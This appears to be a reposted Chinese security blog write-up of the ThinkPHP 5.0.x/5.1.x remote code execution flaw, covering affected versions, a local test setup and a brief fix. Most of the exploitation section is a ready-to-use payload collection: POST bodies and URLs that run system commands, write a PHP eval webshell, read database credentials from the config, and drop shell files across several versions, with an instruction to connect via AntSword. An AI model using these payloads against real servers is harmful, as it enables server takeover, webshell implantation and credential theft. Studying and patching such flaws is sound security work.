0x00 简介
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。
0x01 漏洞概述
由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
0x02 影响版本
ThinkPHP5 5.0.2 - 5.0.23
0x03 环境搭建
测试环境:ThinkPHP_5.0.22
ThinkPHP_5.0.22下载
下载完后解压到 phpstudy 的 www 文件夹内
访问 http://127.0.0.1/thinkphp/public/ 可看到页面
0x04 漏洞利用
1、访问 http://127.0.0.1/thinkphp/public/index.php?s=captcha 并抓包
2、构建 POC 并发包
3、使用蚁剑连接
POC:
通过发包
POST /thinkphp/public/index.php?s=captcha HTTP/1.1
# 查看当前用户
_method=__construct&filter[]=system&method=get&get[]=whoami
# 写入 WebShell(Linux)
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "<?php @eval(\$_POST['pass']);?>" > 1.php
# 写入 WebShell(Windows)
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo ^<?php @eval($_POST['pass']);?^> > 1.php
通过 URL
# 查看数据库用户名
http://127.0.0.1/thinkphp/public/index.php?s=.|think\config/get&name=database.username
# 查看数据库密码
http://127.0.0.1/thinkphp/public/index.php?s=.|think\config/get&name=database.password
# 查看当前用户
http://127.0.0.1/thinkphp/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
# phpinfo
index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
其他版本 POC
当 PHP7 以上无法使用 Assert 的时候用
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=包含&x=phpinfo();
ThinkPHP5
http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
ThinkPHP 5.0.21
http://127.0.0.1/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
http://127.0.0.1/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
ThinkPhP 5.1.*
http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
0x05 漏洞修复
升级到5.0.24及以上,不开启debug模式
0x06 参考 URL
https://xz.aliyun.com/t/3845
https://blog.csdn.net/qq_29647709/article/details/84956221
https://www.freebuf.com/vuls/194127.html
原文地址:https://www.cnblogs.com/anonymous-test/p/14295159.html
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。